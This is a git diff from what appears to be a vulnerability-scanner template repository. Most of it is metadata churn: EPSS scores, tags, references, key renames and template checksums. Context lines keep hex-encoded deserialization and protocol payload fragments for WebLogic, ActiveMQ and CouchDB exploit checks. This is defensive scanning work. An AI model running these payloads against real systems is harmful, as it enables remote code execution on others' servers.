79f6e6b4b0..e414a174ba 100644 --- a/http/osint/piratebay.yaml +++ b/http/osint/piratebay.yaml @@ -9,8 +9,8 @@ info: cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: osint,osint-p2p,piratebay self-contained: true diff --git a/http/technologies/bamboo-detect.yaml b/http/technologies/bamboo-detect.yaml index db0a4aceed..308748a52d 100644 --- a/http/technologies/bamboo-detect.yaml +++ b/http/technologies/bamboo-detect.yaml @@ -7,10 +7,11 @@ info: description: | Detect the presence of Bamboo, a CI/CD tool. metadata: + verified: true + max-request: 1 vendor: atlassian shodan-query: http.favicon.hash:-1379982221 category: devops - verified: true tags: tech,bamboo,atlassian,detect,cicd http: diff --git a/http/technologies/iparapheur-detect.yaml b/http/technologies/iparapheur-detect.yaml index aefe9a2d1f..f18a5cb8ac 100644 --- a/http/technologies/iparapheur-detect.yaml +++ b/http/technologies/iparapheur-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.libriciel.fr/logiciels/iparapheur/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1383463717 tags: iparapheur,detect,tech diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml index 1cfe8f579d..882744bcb7 100644 --- a/http/token-spray/api-openai.yaml +++ b/http/token-spray/api-openai.yaml @@ -7,8 +7,8 @@ info: reference: - https://platform.openai.com/docs/api-reference metadata: - max-request: 1 verified: true + max-request: 1 tags: token-spray,openai self-contained: true diff --git a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml index 030483e262..f87394a960 100644 --- a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml +++ b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-25194 cwe-id: CWE-502 - epss-score: 0.90441 - epss-percentile: 0.98532 + epss-score: 0.91084 + epss-percentile: 0.98627 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/vulnerabilities/dlink/dlink-netgear-xss.yaml b/http/vulnerabilities/dlink/dlink-netgear-xss.yaml index 56d5ae146b..430a68ed33 100644 --- a/http/vulnerabilities/dlink/dlink-netgear-xss.yaml +++ b/http/vulnerabilities/dlink/dlink-netgear-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 4.3 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"DSR-250" tags: xss,dlink,dsr250,netgear diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml index 2ab1808884..25261ffa00 100644 --- a/http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml +++ b/http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml @@ -7,11 +7,10 @@ info: reference: - https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'server: "ecstatic"' tags: node,js,exposure,ecstatic - variables: payload: '{{repeat("A", 1000)}}' diff --git a/http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml b/http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml index cc9cdfe589..ccc3c4090b 100644 --- a/http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml +++ b/http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml @@ -10,11 +10,10 @@ info: - https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA%20jc6%20clobfield%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md - https://blog.csdn.net/qq_41904294/article/details/135074649 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="金和协同管理平台" tags: jinher,jc6,sqli - variables: num: "{{rand_int(9000000, 9999999)}}" diff --git a/http/vulnerabilities/other/sslvpn-client-rce.yaml b/http/vulnerabilities/other/sslvpn-client-rce.yaml index 257f9e82d1..96c038040a 100644 --- a/http/vulnerabilities/other/sslvpn-client-rce.yaml +++ b/http/vulnerabilities/other/sslvpn-client-rce.yaml @@ -8,11 +8,10 @@ info: - https://github.com/server2565543706/Poc/blob/master/POC/anquantongsha.py - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/security_products_rce.py metadata: - max-request: 1 verified: true + max-request: 2 fofa-query: body="/webui/images/default/default/alert_close.jpg" tags: sslvpn,rce,intrusive - variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml index fe7fbefc07..3644698551 100644 --- a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml @@ -9,11 +9,10 @@ info: reference: - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py metadata: - max-request: 3 verified: true + max-request: 3 fofa-query: title="RG-UAC登录页面" && body="admin" tags: rg-uac,file-upload,intrusive,ruijie - variables: random_str: "{{rand_base(6)}}" match_str: "{{md5(random_str)}}" diff --git a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml index 85b517da70..f3764a5682 100644 --- a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml @@ -9,13 +9,11 @@ info: reference: - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_WEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py metadata: - verified: true - max-request: 1 fofa-query: body="请输入您的RG-EG易网关的用户名和密码" + max-request: 2 + verified: true tags: ruijie,router,iot,rce -flow: http(1) && http(2) - http: - method: GET path: diff --git a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml index 3b6d76f62e..81cb0459b6 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml @@ -13,10 +13,10 @@ info: cvss-score: 9.8 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"vBulletin" - tags: vbulletin,ajaxreg,sqli + tags: packetstorm,vbulletin,ajaxreg,sqli http: - raw: diff --git a/javascript/cves/2016/CVE-2016-8706.yaml b/javascript/cves/2016/CVE-2016-8706.yaml index 2b8f5c040c..d8f9c1de0a 100644 --- a/javascript/cves/2016/CVE-2016-8706.yaml +++ b/javascript/cves/2016/CVE-2016-8706.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-8706 cwe-id: CWE-190 epss-score: 0.91612 - epss-percentile: 0.9865 + epss-percentile: 0.98682 cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -26,7 +26,6 @@ info: product: memcached verfied: true tags: cve,cve2016,rce,js,memcached - javascript: - code: | let packet = bytes.NewBuffer(); diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml index 3988ad5526..4eacf226a5 100644 --- a/javascript/cves/2023/CVE-2023-34039.yaml +++ b/javascript/cves/2023/CVE-2023-34039.yaml @@ -22,15 +22,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34039 cwe-id: CWE-327 - epss-score: 0.92957 - epss-percentile: 0.98813 + epss-score: 0.89997 + epss-percentile: 0.98543 cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:* metadata: verified: true vendor: vmware product: aria_operations_for_networks tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize - variables: keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index 1345794b64..07f5783522 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46604 cwe-id: CWE-502 - epss-score: 0.96805 - epss-percentile: 0.99601 + epss-score: 0.97147 + epss-percentile: 0.99758 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +28,6 @@ info: product: activemq shodan-query: product:"ActiveMQ OpenWire Transport" tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev - variables: prefix: "1f00000000000000000001010042" classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401" diff --git a/javascript/network/smb/smb-anonymous-access.yaml b/javascript/network/smb/smb-anonymous-access.yaml index 5ae78d249a..b5bdbc040e 100644 --- a/javascript/network/smb/smb-anonymous-access.yaml +++ b/javascript/network/smb/smb-anonymous-access.yaml @@ -10,9 +10,9 @@ info: - https://wadcoms.github.io/wadcoms/SMBClient-List-Shares-Anonymous/ metadata: verified: true - shodan-query: "port:445" + max-request: 1 + shodan-query: port:445 tags: js,network,smb,enum,misconfig - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/network/smb/smb-shares.yaml b/javascript/network/smb/smb-shares.yaml index 18f4d042f0..bcf84f4fa4 100644 --- a/javascript/network/smb/smb-shares.yaml +++ b/javascript/network/smb/smb-shares.yaml @@ -10,9 +10,9 @@ info: - https://nmap.org/nsedoc/scripts/smb-enum-shares.html metadata: verified: true - shodan-query: "port:445" + max-request: 1 + shodan-query: port:445 tags: js,network,smb,enum - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/network/smb/smb-signing-not-required.yaml b/javascript/network/smb/smb-signing-not-required.yaml index 3f1234a56d..548114b26e 100644 --- a/javascript/network/smb/smb-signing-not-required.yaml +++ b/javascript/network/smb/smb-signing-not-required.yaml @@ -11,9 +11,9 @@ info: - https://nmap.org/nsedoc/scripts/smb2-security-mode.html metadata: verified: true - shodan-query: "port:445" + max-request: 1 + shodan-query: port:445 tags: js,network,smb,enum - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/network/smb/smb2-capabilities.yaml b/javascript/network/smb/smb2-capabilities.yaml index 6a5f36b346..f194bce284 100644 --- a/javascript/network/smb/smb2-capabilities.yaml +++ b/javascript/network/smb/smb2-capabilities.yaml @@ -9,7 +9,8 @@ info: reference: - https://nmap.org/nsedoc/scripts/smb2-capabilities.html metadata: - shodan-query: "port:445" + max-request: 1 + shodan-query: port:445 javascript: - code: | diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index 35d62d50ff..59c5ba1a6f 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -20,13 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2016-2004 cwe-id: CWE-306 - epss-score: 0.06793 + epss-score: 0.09306 + epss-percentile: 0.94119 cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hp product: data_protector - tags: cve,cve2016,network,iot,hp,rce,edb + tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 2a35c07609..7e7129fe9f 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -6,22 +6,28 @@ info: severity: critical description: | Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016. reference: - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py + - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html + - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html + - http://www.securitytracker.com/id/1036373 + - https://www.tenable.com/security/research/tra-2016-21 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.0162 + epss-score: 0.04254 + epss-percentile: 0.914 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true + max-request: 2 + vendor: oracle + product: weblogic_server tags: cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network - variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078" diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index 560abff103..9b511115ee 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -20,7 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-3881 cwe-id: CWE-20 - epss-score: 0.97332 + epss-score: 0.9747 + epss-percentile: 0.9996 cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index aad7d9a325..3cb6106b4f 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -21,7 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-5645 cwe-id: CWE-502 - epss-score: 0.74805 + epss-score: 0.81948 + epss-percentile: 0.98105 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index 3f4bce9eb3..2985a0bb5e 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-2628 cwe-id: CWE-502 epss-score: 0.97523 - epss-percentile: 0.99988 + epss-percentile: 0.99989 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index ab5ab965ce..23947354d6 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -14,13 +14,18 @@ info: - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html + - http://www.securitytracker.com/id/1041301 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2893 - epss-score: 0.97346 + epss-score: 0.97327 + epss-percentile: 0.99866 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: oracle + product: weblogic_server tags: cve,cve2018,weblogic,network,deserialization,rce,oracle tcp: - inputs: diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index c108d3f8b6..caea6fc8a6 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -12,15 +12,20 @@ info: reference: - https://github.com/apache/airflow/pull/9178 - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981 + - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 - epss-score: 0.93693 + epss-score: 0.9386 + epss-percentile: 0.98955 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: apache + product: airflow shodan-query: product:"redis" tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive variables: diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 26442bcb45..923e21c67d 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -19,7 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-1938 cwe-id: CWE-269 - epss-score: 0.97486 + epss-score: 0.97499 + epss-percentile: 0.99978 cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:* metadata: max-request: 4 @@ -27,7 +28,6 @@ info: product: geode shodan-query: title:"Apache Tomcat" tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index cd06d89738..7d8f882308 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -20,13 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7247 cwe-id: CWE-755 - epss-score: 0.9749 + epss-score: 0.97504 + epss-percentile: 0.9998 cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:* metadata: max-request: 2 vendor: openbsd product: opensmtpd - tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev + tags: packetstorm,cve,cve2020,smtp,opensmtpd,network,rce,oast,kev tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index a6cc8e66fa..bb0d229876 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -20,7 +20,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-44521 cwe-id: CWE-732,CWE-94 - epss-score: 0.01212 + epss-score: 0.04449 + epss-percentile: 0.91568 cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 9bbf092688..1a69585c5c 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -21,7 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24706 cwe-id: CWE-1188 - epss-score: 0.97407 + epss-score: 0.97372 + epss-percentile: 0.99891 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -30,7 +31,6 @@ info: product: couchdb shodan-query: product:"CouchDB" tags: cve,cve2022,network,couch,rce,kev,couchdb - variables: name_msg: "00156e00050007499c4141414141414041414141414141" challenge_reply: "00157201020304" diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index ff5136b516..f0b6a760af 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31793 cwe-id: CWE-22 - epss-score: 0.22965 - epss-percentile: 0.96055 + epss-score: 0.2754 + epss-percentile: 0.96365 cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index b32ad6c6ad..8874034a45 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -5,14 +5,15 @@ info: author: pussycat0x severity: low description: | - The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to keep track of which node name listens on which address. Hence, epmd map symbolic node names to machine addresses. + The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to keep track of which node name listens on which address. Hence, epmd map symbolic node names to machine addresses. reference: - https://nmap.org/nsedoc/scripts/epmd-info.html - https://book.hacktricks.xyz/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd metadata: - verified: "true" + max-request: 1 shodan-query: product:"Erlang Port Mapper Daemon" + verified: "true" tags: demon,enum,erlang,epmd network: From 907911e689c457153d5d3480e2d19c2f5607331d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jan 2024 19:28:21 +0530 Subject: [PATCH 042/285] misc changes --- cloud/enum/azure-vm-cloud-enum.yaml | 2 +- http/exposed-panels/goodjob-dashboard.yaml | 2 +- network/misconfig/erlang-daemon.yaml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index 7ed0d03f3c..f271125139 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -8,7 +8,7 @@ info: Searches for Azure virtual machines via their registered DNS names. metadata: verified: true - tags: cloud,cloud-enum,azure + tags: cloud,cloud-enum,azure,fuzz self-contained: true diff --git a/http/exposed-panels/goodjob-dashboard.yaml b/http/exposed-panels/goodjob-dashboard.yaml index 9e46c56576..a5e4e710d4 100644 --- a/http/exposed-panels/goodjob-dashboard.yaml +++ b/http/exposed-panels/goodjob-dashboard.yaml @@ -13,7 +13,7 @@ info: verified: true tags: unauth,panel,goodjob -requests: +http: - method: GET path: - "{{BaseURL}}/jobs" diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index b32ad6c6ad..57f2c1b9bc 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -15,7 +15,7 @@ info: shodan-query: product:"Erlang Port Mapper Daemon" tags: demon,enum,erlang,epmd -network: +tcp: - inputs: - data: "\x00\x01\x6e" From 050fb5172036d17439dbb394ff63cc55e13be63a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jan 2024 14:03:35 +0000 Subject: [PATCH 044/285] Auto Generated Templates Checksum [Sun Jan 14 14:03:35 UTC 2024] :robot: --- templates-checksum.txt | 4562 ++++++++++++++++++++-------------------- 1 file changed, 2281 insertions(+), 2281 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1d33a63d2f..2b2df95e7b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -10,16 +10,16 @@ TOP-10.md:2cd79b73aec87dde6c2ca8ef5f0df433fab3d107 cloud/enum/aws-app-enum.yaml:89c981b97707bcc1220922aedf12d66157efa1b6 cloud/enum/aws-s3-bucket-enum.yaml:0d19ed31b316429acb70c17108bcae54970daf81 cloud/enum/azure-db-enum.yaml:b18cd9ca19b58bebad8d6435696ea190ffece035 -cloud/enum/azure-vm-cloud-enum.yaml:92bdaa05432ebef310e6309cee9aa68b47fe8b73 -cloud/enum/azure-website-enum.yaml:b602443f8b805523db4b21c575ea02958b233e80 -cloud/enum/gcp-app-engine-enum.yaml:87cf81f01096d8d46a8a4ecfd3cbbebefb0a6e1f -cloud/enum/gcp-bucket-enum.yaml:dfb4ce78b2e788e63e854002d5ebab5d5df1595c -cloud/enum/gcp-firebase-app-enum.yaml:edf117129322748b176e2bdfe3c09c9dd08f7922 -cloud/enum/gcp-firebase-rtdb-enum.yaml:b58a6dddcce8919580ea3c23ae1e9f0b1a1f8ed8 +cloud/enum/azure-vm-cloud-enum.yaml:f1970e4207b9745d23c2b69b5dab1c8d01ab4a17 +cloud/enum/azure-website-enum.yaml:3f7af53198db30d1ab0e8c30722d491b541ec946 +cloud/enum/gcp-app-engine-enum.yaml:54f769d6fa0eacab1c0bf178cbc01a3fa7fe4dbb +cloud/enum/gcp-bucket-enum.yaml:a5cce75fcb9e8f3cd961be947faadf2a147812a6 +cloud/enum/gcp-firebase-app-enum.yaml:85b30f6314da6b62b75d075fef4f4fc0346d4213 +cloud/enum/gcp-firebase-rtdb-enum.yaml:948d89ca401c69713e8f66b6c9d6c7d0719ab290 code/cves/2019/CVE-2019-14287.yaml:7a831fe3e3be1b5c8778b3dd991667259af7a5b5 code/cves/2021/CVE-2021-3156.yaml:2f12cbb209881079450613554e1fa0cf526eb952 code/cves/2023/CVE-2023-2640.yaml:50153a9f47faa62533d609faec8d12113d620354 -code/cves/2023/CVE-2023-49105.yaml:3512873783f700bf5fb98b342dd84653085a0a79 +code/cves/2023/CVE-2023-49105.yaml:ec754d96eef6c9e32638365bfceb97de7f0607f2 code/cves/2023/CVE-2023-4911.yaml:b0087888697dcdbdf06ec95866cf08fcd6a2a76a config/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f config/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e @@ -359,7 +359,7 @@ file/webshell/asp-webshell.yaml:3d5fd63aebe784dc4f49b04478b7fef5f4e9e2c2 file/webshell/jsp-webshell.yaml:2d750d74431e61570c7d96d5ffeb4353d3820a1d file/webshell/php-webshell.yaml:8465f2abe6a2b13a2f3ceaa3c277a7fdebdfaa41 file/xss/dom-xss.yaml:40436508df8f3c8cd80d076702738b9df22ed281 -headless/cves/2018/CVE-2018-25031.yaml:83e79b14fa6dfda39a0e4cd47320b30c6226c139 +headless/cves/2018/CVE-2018-25031.yaml:b3ebde8bc84cab52ec2217bd4f75447e3cd268b3 headless/dvwa-headless-automatic-login.yaml:4c1f2437b541a83dfda0e1239995b08a0315e478 headless/extract-urls.yaml:499408f8b8d77cb5315ed584ac23c90328823a3f headless/headless-open-redirect.yaml:a67d2b3108c8870d7907b8f9244cb5697d4341ff @@ -679,2258 +679,2258 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:b360401b724799237fbd4b0b00 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:cbc4e1b8c4e34dac287a4252acb76481bf0e4dc5 http/credential-stuffing/self-hosted/grafana-login-check.yaml:8f5793e273b313b8fdc6ef9a28efef7786fe4802 http/credential-stuffing/self-hosted/jira-login-check.yaml:cccab91229b3c826d50f35b9d6b3a52755417602 -http/cves/2000/CVE-2000-0114.yaml:9216f01e2ee80ffe7fe7c96e39ab41398ad38cc1 -http/cves/2001/CVE-2001-0537.yaml:a3b6f678a9d0152e7aef216d63e27dd8a38977b7 